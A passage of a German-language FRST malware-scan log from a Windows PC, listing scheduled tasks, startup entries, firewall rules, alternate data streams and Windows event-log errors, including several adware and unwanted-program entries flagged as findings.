Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=5.3.0.111.261&amp;LastError=404
Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig)
Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung"
Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly
Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)
Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU
AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU
AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU
AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> 
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe"
MSCONFIG\startupreg: Bitdefender-Geldb�rse => 
MSCONFIG\startupreg: Bitdefender-Geldb�rse-Anwendungs-Agent => 
MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min
MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun
MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU
MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe"
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe
MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe
MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe
FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe
FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe
FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe
FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe
FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm
FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe
FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe
FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe
FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe
FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe
FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe
FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe
FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe
FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin
FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin
FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe
FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe
FirewallRules: [{FBF0ABCC-062A-4B94-887D-CA8EC51DD4BC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{9B7A0074-94B2-4650-9597-31794BEE9247}] => (Allow) D:\Wuala\microsoft office\Office12\outlook.exe
FirewallRules: [{CE870A15-9C31-4DCF-BD3B-B42479BD0CE2}] => (Allow) D:\Wuala\microsoft office\Office12\GROOVE.EXE
FirewallRules: [{56AF879B-0A7D-4EBB-849F-6EDCFB794698}] => (Allow) D:\Wuala\microsoft office\Office12\GROOVE.EXE
FirewallRules: [{666FC075-A8C4-4DE7-BE15-13B132792113}] => (Allow) D:\Wuala\microsoft office\Office12\ONENOTE.EXE
FirewallRules: [{AFE0148D-6233-4B7C-899B-A6B662765CBE}] => (Allow) D:\Wuala\microsoft office\Office12\ONENOTE.EXE

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (09/28/2015 10:52:33 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 10:01:47 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 10:01:42 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 09:59:44 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 09:56:46 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"1".
Die abhängige Assemblierung "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (09/28/2015 07:34:23 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 07:34:20 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 07:34:17 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 06:13:43 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.

Error: (09/28/2015 06:13:13 PM) (Source: SideBySide) (EventID: 80) (User: )
Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in
Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3.
Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit
einer anderen, bereits aktiven Komponentenversion.
In Konflikt stehende Komponenten:.
Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest.
Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest.


Systemfehler:
=============
Error: (09/29/2015 09:44:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "IE Search Set" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (09/29/2015 09:44:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "LavasoftTcpService" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (09/29/2015 09:42:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Windows Modules Installer" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1069

Error: (09/29/2015 09:42:55 AM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Der Dienst "TrustedInstaller" konnte sich nicht als "NT AUTHORITY\SYSTEM" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
%%50

Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (09/29/2015 09:41:27 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: 
%%1056

Error: (09/29/2015 09:41:26 AM) (Source: DCOM) (EventID: 10010) (User: )
